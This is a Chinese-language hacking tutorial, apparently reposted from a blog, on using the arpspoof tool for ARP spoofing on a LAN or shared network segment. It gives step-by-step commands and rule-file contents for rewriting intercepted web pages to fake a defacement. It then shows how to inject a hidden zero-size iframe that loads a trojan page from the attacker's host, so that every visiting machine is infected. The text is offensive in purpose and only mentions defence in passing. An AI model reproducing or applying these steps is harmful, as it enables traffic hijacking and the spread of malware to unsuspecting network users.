ARP挂马***--嗅探欺骗的最恐怖方式
局域网内"交换型"网络环境中的嗅探***,利用的是ARP欺骗的原理,它是点对点地发生在3台主机(网关、欺骗主机与被欺骗主机)之间的。
然而在2007年初,以ARPSpoof工具为代表的新兴ARP欺骗技术发生了变化,直接针对网关进行欺骗,让通过网关访问网络的所有主机全被欺骗***,以造成网站被***的假象,或者直接访问到***网页。
也就是说,一对一的***技术发展为一对多的***模式。而且,新兴的ARP欺骗技术,不仅可以在局域网中使用,还被广泛地应用在Internet网络中,***目标的范围更加广泛。
---------------------------------------------------------------------------------------------------------------------
ARPSpoof欺骗 公司网页被黑挂马
ARPSpoof是一个ARP欺骗***工具,它的应用环境非常广泛。
首先,在普通的公司、企业或网吧等局域网中,无论是采用Hub集线器、路由器还是采用交换机组建的局域网都适用。其次,在光纤和宽带等Internet网络中,有许多用户采用静态分配IP地址的方式上网,即使用公共的网关IP地址,这类处于同一网段内的公网网络也会遭到***。
此外,在普通的Internet中也能应用ARP欺骗***。例如,***者要***腾讯网站,只需要***与腾讯网在同一网段的某台主机,然后运行ARPSpoof,就可以达到在腾讯网上挂马的目的。普通浏览网页的用户对此根本无能为力,只有依靠腾讯网站管理员在网关上安装ARP防火墙才可以防止此类***。
可见ARPSpoof的危害是如此的大。特别是***者在******过程中,只要进入了内网,就可以利用ARPSpoof进行ARP欺骗挂马***,从而让内网中的所有用户都被******。
***只需一步,即可完成内网***中的横向权限提升***。
1.网站被黑的假象
为了说明ARPSpoof的***原理,这里利用ARPSpoof进行一次网站被黑的欺骗***的操作。***的效果是,在局域网中让所有用户访问内部网站服务器时,网页上显示被******的信息。
1)查询网关与网站服务器的IP地址
在命令窗口中执行命令:
- ipconfig /all
此命令是显示本机网络信息的。其中"Default Gateway"显示为"192.168.1.1",就是网关IP地址;本机IP地址为"192.168.1.8",如图8-39所示。
再执行命令:
- ping 网站网址
即可知道要***的网站内网的IP地址,这里假设目标网站的IP地址为"192.168.1.8"。
2)生成欺骗规则
下载ARP欺骗工具"arpspoof 3.1b",打开命令窗口并进入程序所在的文件夹,执行如下命令(见图8-40):
- arpspoof.exe /n
(点击查看大图)图8-39 获得网关服务器的IP地址 |
(点击查看大图)图8-40 导出欺骗规则 |
- ----
- HTTP/1.
- ----
- HTTP/1.1 200 OK\r\nServer: CoolDiyer's Hack
IIS\r\nContent-Length: 27\r\nConnection:
close\r\nContent-Type: text/html\r\n\r\nHack
by cooldiyer<noframes> - ----
"HTTP/1"表示嗅探到数据包中的数据,"HTTP/1.1 200 OK\r\nServer: CoolDiyer's Hack IIS\r\nContent-Length: 27\r\nConnection: close\r\nContent-Type: text/html\r\n\r\nHack by cooldiyer<noframes>"表示要替换成的字符。也就是说,嗅探到"HTTP/1."数据后,自动将其替换为后者的内容。替换后在网页中显示"Hack by cooldiyer"字符串,并且可以将"cooldiyer"替换为任意名称,如图8-41所示,修改后保存文件。
- ----
- 原字符串
- ----
- 替换后的字符串
- ----
可以用同样的格式书写多行替换字符。例如,修改成如下内容:
- ----
- <hea
- ----
- Hack by 冰河洗剑<noframes>
- ----
- <HEA
- ----
- Hack by 冰河洗剑<noframes>
- ----
该规则可将捕获到的网络数据包中的"<hea"或"<HEA",替换为"Hack by 冰河洗剑"的字样。如果用户对网页源代码编辑比较熟悉的话,就可以随心所欲地替换代码,以显示想要的效果。
3)欺骗***
在命令行下执行命令(见图8-42):
- arpspoof.exe /l
将会显示当前的网络配置信息,包括网卡的数目,以及网关与本机的IP地址。本机有两块网卡,选择用于欺骗***的网卡为"1.Realtek RTL8139",因此网卡序号为0。如果只有一块网卡,则网卡的序号直接为0。由此,可执行如下命令(见图8-43):
- arpspoof.exe 192.168.1.1 192.168.1.8 80 1 1 /r job.txt
命令执行后即可开始嗅探欺骗***。当校园网内的计算机访问校园网站(192.168.1.8)时,都必须通过网关(192.168.1.1)转发数据,才能访问到校园网站。如果要终止ARP欺骗***,可以按【Ctrl+C】组合键,提示Reseting后,等待5秒钟,整个局域网即可恢复正常。
由于本机(192.168.1.198)正在进行ARP欺骗***,该欺骗代替了真正的校园网站,并且网关会将访问者计算机的数据转发到本机上。因此,在进行ARP欺骗***后,其他同学访问到的实际上是***者设置的数据--其他同学访问校园网站时,打开的网页不是真实的网页,而是被替换后的页面,如图8-44所示。
2.内网挂马,ARP欺骗在***中的应用
***者除了制造网站服务器被黑的假象外,还可以制造真正的***--使访问该网页的所有主机都被***程序***,让***者直接利用网页***提升权限并控制内网中所有的主机。
1)制作网页***
首先,***者需要制作一个网页***,可以使用"微软Ani网页***生成器",如图8-45所示。在上方输入本机的IP地址,这里是"
http://192.168.1.198/";在下方输入***程序链接地址,这里***者直接在本地建立一个网站,因此***可以直接放在***主机上。
单击【生成网页***】按钮,即可在软件当前目录下生成3个文件:"index.htm"、"z1.jpg"、"z2.jpg",如图8-46所示。在"C:\"目录下新建一个名称为"WEB"的文件夹,将这3个文件和***程序都复制到"C:\WEB"文件夹中。
2)建立***的网页服务
运行"紫雨轩 ASP Web 服务器 v1.0.4.10",如图8-47所示,这是一个小型的Web服务器软件。
单击工具栏中的【参数设置】按钮,在弹出的"参数设置"对话框中设置"根目录"为"C:\web",将"缺省文件"设置为"index.htm",其他项保持默认,单击【OK】按钮,完成设置,如图8-48所示。
(点击查看大图)图8-47 紫雨轩 ASP Web 服务器 |
(点击查看大图)图8-48 "参数设置"对话框 |
(点击查看大图)图8-49 网页***建立成功 |
3)建立挂马规则
修改前面生成的"job.txt"文件,修改后的内容如下:
- ----
- </HTML>
- ----
- <iframe src=http://192.168.1.198/index.htm width=0 height=0></iframe></HTML>
保存该文件后,同样用上面的方法进行ARP欺骗,在命令行下执行命令(见图8-50):
- arpspoof.exe 192.168.1.8 192.168.1.1 80 0 0 /r job.txt
转载于:https://blog.51cto.com/suguiyang/261745